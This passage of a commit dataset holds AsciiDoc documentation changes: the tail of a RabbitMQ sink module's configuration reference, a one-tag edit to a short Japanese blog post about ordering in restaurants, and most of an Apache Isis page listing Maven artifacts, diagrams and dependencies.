$$converterBeanName$$ property.\n\n\/\/end::ref-doc[]\n\n== Build\n\n```\n$ mvn clean package\n```\n","old_contents":"\/\/tag::ref-doc[]\n= RabbitMQ Sink\n\nThis module sends messages to RabbitMQ.\n\n== Options\n\nThe **$$rabbit$$** $$sink$$ has the following options:\n\n(See the Spring Boot documentation for RabbitMQ connection properties)\n\n\/\/tag::configuration-properties[]\n$$rabbit.converter-bean-name$$:: $$The bean name for a custom message converter; if omitted, a SimpleMessageConverter is used.\n If 'jsonConverter', a Jackson2JsonMessageConverter bean will be created for you.$$ *($$String$$, default: `<none>`)*\n$$rabbit.exchange$$:: $$Exchange name - overridden by exchangeNameExpression, if supplied.$$ *($$String$$, default: `<empty string>`)*\n$$rabbit.exchange-expression$$:: $$A SpEL expression that evaluates to an exchange name.$$ *($$Expression$$, default: `<none>`)*\n$$rabbit.mapped-request-headers$$:: $$Headers that will be mapped.$$ *($$String[]$$, default: `[*]`)*\n$$rabbit.persistent-delivery-mode$$:: $$Default delivery mode when 'amqp_deliveryMode' header is not present,\n true for PERSISTENT.$$ *($$Boolean$$, default: `false`)*\n$$rabbit.routing-key$$:: $$Routing key - overridden by routingKeyExpression, if supplied.$$ *($$String$$, default: `<none>`)*\n$$rabbit.routing-key-expression$$:: $$A SpEL expression that evaluates to a routing key.$$ *($$Expression$$, default: `<none>`)*\n$$spring.rabbitmq.addresses$$:: $$Comma-separated list of addresses to which the client should connect to.$$ *($$String$$, default: `<none>`)*\n$$spring.rabbitmq.host$$:: $$RabbitMQ host.$$ *($$String$$, default: `localhost`)*\n$$spring.rabbitmq.password$$:: $$Login to authenticate against the broker.$$ *($$String$$, default: `<none>`)*\n$$spring.rabbitmq.port$$:: $$RabbitMQ port.$$ *($$Integer$$, default: `5672`)*\n$$spring.rabbitmq.requested-heartbeat$$:: $$Requested heartbeat timeout, in seconds; zero for none.$$ *($$Integer$$, default: `<none>`)*\n$$spring.rabbitmq.username$$:: $$Login user to authenticate to the broker.$$ *($$String$$, default: `<none>`)*\n$$spring.rabbitmq.virtual-host$$:: $$Virtual host to use when connecting to the broker.$$ *($$String$$, default: `<none>`)*\n\/\/end::configuration-properties[]\n\nNOTE: By default, the message converter is a `SimpleMessageConverter` which handles `byte[]`, `String` and\n`java.io.Serializable`.\nA well-known bean name `jsonConverter` will configure a `Jackson2JsonMessageConverter` instead.\nIn addition, a custom converter bean can be added to the context and referenced by the $$converterBeanName$$ property.\n\n\/\/end::ref-doc[]\n\n== Build\n\n```\n$ mvn clean package\n```\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73dbd64535a41d4d02df43631ee507a294893138","subject":"Update 2015-09-14-I-found-it-diffcult-to-order-in-a-restaurant.adoc","message":"Update 2015-09-14-I-found-it-diffcult-to-order-in-a-restaurant.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-14-I-found-it-diffcult-to-order-in-a-restaurant.adoc","new_file":"_posts\/2015-09-14-I-found-it-diffcult-to-order-in-a-restaurant.adoc","new_contents":"= \u30ec\u30b9\u30c8\u30e9\u30f3\u3067\u6ce8\u6587\u3063\u3066\u57fa\u672c\u7684\u306a\u4f1a\u8a71\u306a\u306e\u306b\u610f\u5916\u3068\u96e3\u3057\u3044\u3088\u306d\u3002\n:hp-alt-title: I found it diffcult to order in a restaurant.\n\n\u57fa\u672c\u3058\u3083\u3093\uff1f\u306a\u3093\u304b\u3053\u3046\u82f1\u4f1a\u8a71\u3063\u3066\u305d\u3046\u3044\u3046\u306e\u3084\u308b\u30a4\u30e1\u30fc\u30b8\u3042\u308b\u3058\u3083\u3093\uff1f\n\n\u3067\u3002\n\n\u3044\u3056\u884c\u304f\u3068\u3002\n\n\u306a\u304b\u306a\u304b\u96e3\u3057\u3044\u3002\n\n\n:hp-tags:English\n","old_contents":"= \u30ec\u30b9\u30c8\u30e9\u30f3\u3067\u6ce8\u6587\u3063\u3066\u57fa\u672c\u7684\u306a\u4f1a\u8a71\u306a\u306e\u306b\u610f\u5916\u3068\u96e3\u3057\u3044\u3088\u306d\u3002\n:hp-alt-title: I found it diffcult to order in a restaurant.\n\n\u57fa\u672c\u3058\u3083\u3093\uff1f\u306a\u3093\u304b\u3053\u3046\u82f1\u4f1a\u8a71\u3063\u3066\u305d\u3046\u3044\u3046\u306e\u3084\u308b\u30a4\u30e1\u30fc\u30b8\u3042\u308b\u3058\u3083\u3093\uff1f\n\n\u3067\u3002\n\n\u3044\u3056\u884c\u304f\u3068\u3002\n\n\u306a\u304b\u306a\u304b\u96e3\u3057\u3044\u3002\n\n\n:hp-tags:\u82f1\u8a9e\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"b7cfe9e0780f74f386ba15efac502ac06d537678","subject":"ISIS-2444: regen projdoc","message":"ISIS-2444: regen projdoc\n","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"antora\/components\/refguide-index\/modules\/_overview\/pages\/about.adoc","new_file":"antora\/components\/refguide-index\/modules\/_overview\/pages\/about.adoc","new_contents":"= System Overview\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\nThese tables summarize all Maven artifacts available with _Apache Isis_.\n\n== App\n\n[plantuml,App,svg]\n----\n@startuml(id=App)\ntitle App - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"App\\n[Software System]\" {\n rectangle \"==Apache Isis Starter Parent\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (App)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Starter Parent\n[source,yaml]\n----\nGroup: org.apache.isis.app\nArtifact: isis-app-starter-parent\nType: pom\nDirectory: \/starters\n----\n|Parent pom providing dependency and plugin management for Apache Isis applications\nbuilt with Maven. Builds on top of spring-boot-starter-parent.\n|===\n\n== Mavendeps\n\n[plantuml,Mavendeps,svg]\n----\n@startuml(id=Mavendeps)\ntitle Mavendeps - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Mavendeps\\n[Software System]\" {\n rectangle \"==Apache Isis Maven Deps\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Maven Deps - BDD Integ Spec\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Maven Deps - Integration Testing\\n<size:10>[Container: packaging: pom]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Maven Deps - JDK11\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Maven Deps - JDO\\n<size:10>[Container: packaging: pom]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Maven Deps - JPA\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Maven Deps - Testing\\n<size:10>[Container: packaging: pom]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Maven Deps - Webapp\\n<size:10>[Container: packaging: pom]<\/size>\" <<9>> as 9\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 8 : \"\"\n2 .[#707070].> 9 : \"\"\n@enduml\n----\n.Projects\/Modules (Mavendeps)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Maven Deps\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps\nType: pom\nDirectory: \/mavendeps\n----\n|Collection of Apache Isis Maven Dependency Bundles.\n\n|Apache Isis Maven Deps - BDD Integ Spec\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-integspecs\nType: pom\nDirectory: \/mavendeps\/integspecs\n----\n|Defines a module that can be used as a single dependency for BDD (Cucumber) specs as integration tests.\n\n.Dependencies\n****\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-specsupport-applib:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - Integration Testing\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-integtests\nType: pom\nDirectory: \/mavendeps\/integtests\n----\n|Defines a module that can be used as a single dependency for integration tests.\n\n.Dependencies\n****\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - JDK11\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-jdk11\nType: pom\nDirectory: \/mavendeps\/jdk11\n----\n|Defines a module to bring in dependencies that were part of JDK 8 but\nhad been removed with JDK 11+. These dependencies are activated when the\nconsuming project is built with JDK 11 or higher.\n\n|Apache Isis Maven Deps - JDO\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-jdo\nType: pom\nDirectory: \/mavendeps\/jdo\n----\n|Defines a module that provides the default JDO persistence layer integration\nfor running an Apache Isis webapp (Wicket, Restful Objects and Shiro security).\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-datanucleus:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - JPA\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-jpa\nType: pom\nDirectory: \/mavendeps\/jpa\n----\n|Defines a module that provides the default JPA persistence layer integration\nfor running an Apache Isis webapp (Wicket, Restful Objects and Shiro security).\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-eclipselink:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - Testing\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-unittests\nType: pom\nDirectory: \/mavendeps\/unittests\n----\n|Defines a module that can be used as a single dependency for a set of common testing libraries.\n\n.Dependencies\n****\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - Webapp\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-webapp\nType: pom\nDirectory: \/mavendeps\/webapp\n----\n|Defines a module that can be almost used as a single dependency for running\nan Apache Isis webapp (Wicket, Restful Objects and Shiro security).\n\nNote: Also requires a persistence provider.\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.security:isis-security-bypass:jar:<managed> +\norg.apache.isis.security:isis-security-keycloak:jar:<managed> +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-jaxrsresteasy4:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-viewer:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-viewer:jar:<managed> +\norg.springframework.boot:spring-boot-starter-tomcat:jar:<managed> +\norg.springframework.boot:spring-boot-starter-web:jar:<managed> +\n****\n|===\n\n== Testing\n\n[plantuml,Testing,svg]\n----\n@startuml(id=Testing)\ntitle Testing - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<11>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<12>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<13>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<14>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<15>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<16>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<17>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<18>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<10>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Testing\\n[Software System]\" {\n rectangle \"==Apache Isis Testing\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Tst - FakeData (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Tst - FakeData (fixtures)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Tst - FakeData (integ tests)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Tst - FakeData (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Tst - Fixtures (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Tst - Fixtures (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Tst - H2 Console (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Tst - H2 Console (ui)\\n<size:10>[Container: packaging: jar]<\/size>\" <<10>> as 10\n rectangle \"==Apache Isis Tst - HSQLDB Manager\\n<size:10>[Container: packaging: jar]<\/size>\" <<12>> as 12\n rectangle \"==Apache Isis Tst - HSQLDB Manager (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<11>> as 11\n rectangle \"==Apache Isis Tst - Integ Test Support (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<14>> as 14\n rectangle \"==Apache Isis Tst - Integ Test Support (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<13>> as 13\n rectangle \"==Apache Isis Tst - Spec\/Cucumber (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<16>> as 16\n rectangle \"==Apache Isis Tst - Spec\/Cucumber (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<15>> as 15\n rectangle \"==Apache Isis Tst - Unit Test Support (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<18>> as 18\n rectangle \"==Apache Isis Tst - Unit Test Support (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<17>> as 17\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 9 : \"\"\n2 .[#707070].> 11 : \"\"\n2 .[#707070].> 13 : \"\"\n2 .[#707070].> 15 : \"\"\n2 .[#707070].> 17 : \"\"\n3 .[#707070].> 4 : \"\"\n3 .[#707070].> 5 : \"\"\n3 .[#707070].> 6 : \"\"\n7 .[#707070].> 8 : \"\"\n9 .[#707070].> 10 : \"\"\n11 .[#707070].> 12 : \"\"\n13 .[#707070].> 14 : \"\"\n15 .[#707070].> 16 : \"\"\n17 .[#707070].> 18 : \"\"\n@enduml\n----\n.Projects\/Modules (Testing)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Testing\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing\nType: pom\nDirectory: \/testing\n----\n|A library of utilities, mini-frameworks and tools for prototyping and testing Apache Isis applications.\n\n|Apache Isis Tst - FakeData (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fakedata\nType: pom\nDirectory: \/testing\/fakedata\n----\n|A module providing a domain service to generate fake random data\nfor use in unit tests or integration tests.\n\n|Apache Isis Tst - FakeData (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fakedata-applib\nType: jar\nDirectory: \/testing\/fakedata\/applib\n----\n|.Components\n****\no.a.i.testing.fakedata.applib.services.FakeDataService +\n****\n\n.Dependencies\n****\ncom.github.javafaker:javafaker:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/fakedata\/applib\/IsisModuleTestingFakeDataApplib.adoc[IsisModuleTestingFakeDataApplib], xref:refguide:testing:index\/fakedata\/applib\/services\/AbstractRandomValueGenerator.adoc[AbstractRandomValueGenerator], xref:refguide:testing:index\/fakedata\/applib\/services\/Addresses.adoc[Addresses], xref:refguide:testing:index\/fakedata\/applib\/services\/BigDecimals.adoc[BigDecimals], xref:refguide:testing:index\/fakedata\/applib\/services\/BigIntegers.adoc[BigIntegers], xref:refguide:testing:index\/fakedata\/applib\/services\/Books.adoc[Books], xref:refguide:testing:index\/fakedata\/applib\/services\/Booleans.adoc[Booleans], xref:refguide:testing:index\/fakedata\/applib\/services\/Bytes.adoc[Bytes], xref:refguide:testing:index\/fakedata\/applib\/services\/Chars.adoc[Chars], xref:refguide:testing:index\/fakedata\/applib\/services\/Collections.adoc[Collections], xref:refguide:testing:index\/fakedata\/applib\/services\/Comms.adoc[Comms], xref:refguide:testing:index\/fakedata\/applib\/services\/CreditCards.adoc[CreditCards], xref:refguide:testing:index\/fakedata\/applib\/services\/Doubles.adoc[Doubles], xref:refguide:testing:index\/fakedata\/applib\/services\/Enums.adoc[Enums], xref:refguide:testing:index\/fakedata\/applib\/services\/FakeDataService.adoc[FakeDataService], xref:refguide:testing:index\/fakedata\/applib\/services\/Floats.adoc[Floats], xref:refguide:testing:index\/fakedata\/applib\/services\/Integers.adoc[Integers], xref:refguide:testing:index\/fakedata\/applib\/services\/IsisBlobs.adoc[IsisBlobs], xref:refguide:testing:index\/fakedata\/applib\/services\/IsisClobs.adoc[IsisClobs], xref:refguide:testing:index\/fakedata\/applib\/services\/IsisPasswords.adoc[IsisPasswords], xref:refguide:testing:index\/fakedata\/applib\/services\/J8DateTimes.adoc[J8DateTimes], xref:refguide:testing:index\/fakedata\/applib\/services\/J8LocalDates.adoc[J8LocalDates], xref:refguide:testing:index\/fakedata\/applib\/services\/J8Periods.adoc[J8Periods], xref:refguide:testing:index\/fakedata\/applib\/services\/JavaSqlDates.adoc[JavaSqlDates], xref:refguide:testing:index\/fakedata\/applib\/services\/JavaSqlTimestamps.adoc[JavaSqlTimestamps], xref:refguide:testing:index\/fakedata\/applib\/services\/JavaUtilDates.adoc[JavaUtilDates], xref:refguide:testing:index\/fakedata\/applib\/services\/JodaDateTimes.adoc[JodaDateTimes], xref:refguide:testing:index\/fakedata\/applib\/services\/JodaLocalDates.adoc[JodaLocalDates], xref:refguide:testing:index\/fakedata\/applib\/services\/JodaPeriods.adoc[JodaPeriods], xref:refguide:testing:index\/fakedata\/applib\/services\/Longs.adoc[Longs], xref:refguide:testing:index\/fakedata\/applib\/services\/Lorem.adoc[Lorem], xref:refguide:testing:index\/fakedata\/applib\/services\/Names.adoc[Names], xref:refguide:testing:index\/fakedata\/applib\/services\/Shorts.adoc[Shorts], xref:refguide:testing:index\/fakedata\/applib\/services\/Strings.adoc[Strings], xref:refguide:testing:index\/fakedata\/applib\/services\/Urls.adoc[Urls], xref:refguide:testing:index\/fakedata\/applib\/services\/Uuids.adoc[Uuids]\n****\n\n|Apache Isis Tst - FakeData (fixtures)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fakedata-fixtures\nType: jar\nDirectory: \/testing\/fakedata\/fixtures\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Tst - FakeData (integ tests)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fakedata-integtests\nType: jar\nDirectory: \/testing\/fakedata\/integtests\n----\n|.Dependencies\n****\norg.apache.isis.mavendeps:isis-mavendeps-integtests:pom:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-datanucleus:jar:<managed> +\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fakedata-fixtures:jar:<managed> +\n****\n\n|Apache Isis Tst - Fixtures (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fixtures\nType: pom\nDirectory: \/testing\/fixtures\n----\n|Library to initialize the system under test, either for integration testing or for prototyping.\n\n|Apache Isis Tst - Fixtures (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fixtures-applib\nType: jar\nDirectory: \/testing\/fixtures\/applib\n----\n|.Components\n****\no.a.i.testing.fixtures.applib.fixturescripts.ExecutionParametersService +\no.a.i.testing.fixtures.applib.modules.ModuleWithFixturesService +\no.a.i.testing.fixtures.applib.queryresultscache.QueryResultsCacheControlDefault +\no.a.i.testing.fixtures.applib.services.FixturesLifecycleService +\n****\n\n.Dependencies\n****\njoda-time:joda-time:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-applib:jar:<managed> +\norg.apache.isis.subdomains:isis-subdomains-spring-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\n****\n\n|Apache Isis Tst - H2 Console (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-h2console\nType: pom\nDirectory: \/testing\/h2console\n----\n|Menu and configuration to open up H2 Console\n\n|Apache Isis Tst - H2 Console (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-h2console-ui\nType: jar\nDirectory: \/testing\/h2console\/ui\n----\n|.Components\n****\no.a.i.testing.h2console.ui.webmodule.WebModuleH2Console +\n****\n\n.Dependencies\n****\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/h2console\/ui\/IsisModuleTestingH2ConsoleUi.adoc[IsisModuleTestingH2ConsoleUi], xref:refguide:testing:index\/h2console\/ui\/services\/H2ManagerMenu.adoc[H2ManagerMenu], xref:refguide:testing:index\/h2console\/ui\/webmodule\/WebModuleH2Console.adoc[WebModuleH2Console]\n****\n\n|Apache Isis Tst - HSQLDB Manager (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-hsqldbmgr\nType: pom\nDirectory: \/testing\/hsqldbmgr\n----\n|Menu and configuration to open up HSQLDB Manager\n\n|Apache Isis Tst - HSQLDB Manager\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-hsqldbmgr-ui\nType: jar\nDirectory: \/testing\/hsqldbmgr\/ui\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.hsqldb:hsqldb:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/hsqldbmgr\/dom\/IsisModuleExtHsqldbMgr.adoc[IsisModuleExtHsqldbMgr], xref:refguide:extensions:index\/hsqldbmgr\/dom\/services\/HsqlDbManagerMenu.adoc[HsqlDbManagerMenu]\n****\n\n|Apache Isis Tst - Integ Test Support (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-integtestsupport\nType: pom\nDirectory: \/testing\/integtestsupport\n----\n|Support for writing integ tests in JUnit 5; should be added as a dependency with scope=test only\n\n|Apache Isis Tst - Integ Test Support (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-integtestsupport-applib\nType: jar\nDirectory: \/testing\/integtestsupport\/applib\n----\n|.Components\n****\no.a.i.testing.integtestsupport.applib.IsisIntegrationTestAbstract$InteractionSupport +\n****\n\n.Dependencies\n****\ncom.approvaltests:approvaltests:jar:<managed> +\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.security:isis-security-bypass:jar:<managed> +\norg.hamcrest:hamcrest-library:jar:<managed> +\norg.hsqldb:hsqldb:jar:<managed> +\norg.slf4j:slf4j-api:jar:${slf4j-api.version} +\norg.springframework:spring-test:jar:<managed> +\norg.springframework.boot:spring-boot-starter-test:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/integtestsupport\/applib\/ExceptionRecognizerTranslate.adoc[ExceptionRecognizerTranslate], xref:refguide:testing:index\/integtestsupport\/applib\/IsisIntegrationTestAbstract.adoc[IsisIntegrationTestAbstract], xref:refguide:testing:index\/integtestsupport\/applib\/IsisInteractionHandler.adoc[IsisInteractionHandler], xref:refguide:testing:index\/integtestsupport\/applib\/ThrowableMatchers.adoc[ThrowableMatchers], xref:refguide:testing:index\/integtestsupport\/applib\/swagger\/SwaggerExporter.adoc[SwaggerExporter], xref:refguide:testing:index\/integtestsupport\/applib\/validate\/DomainModelValidator.adoc[DomainModelValidator]\n****\n\n|Apache Isis Tst - Spec\/Cucumber (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-specsupport\nType: pom\nDirectory: \/testing\/specsupport\n----\n|Allows Cucumber to be used to write BDD-style specifications, generally as an alternative to integration tests.\n\n|Apache Isis Tst - Spec\/Cucumber (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-specsupport-applib\nType: jar\nDirectory: \/testing\/specsupport\/applib\n----\n|.Dependencies\n****\nio.cucumber:cucumber-java:jar:<managed> +\nio.cucumber:cucumber-junit-platform-engine:jar:<managed> +\nio.cucumber:cucumber-spring:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/specsupport\/applib\/IsisModuleTestingSpecSupportApplib.adoc[IsisModuleTestingSpecSupportApplib], 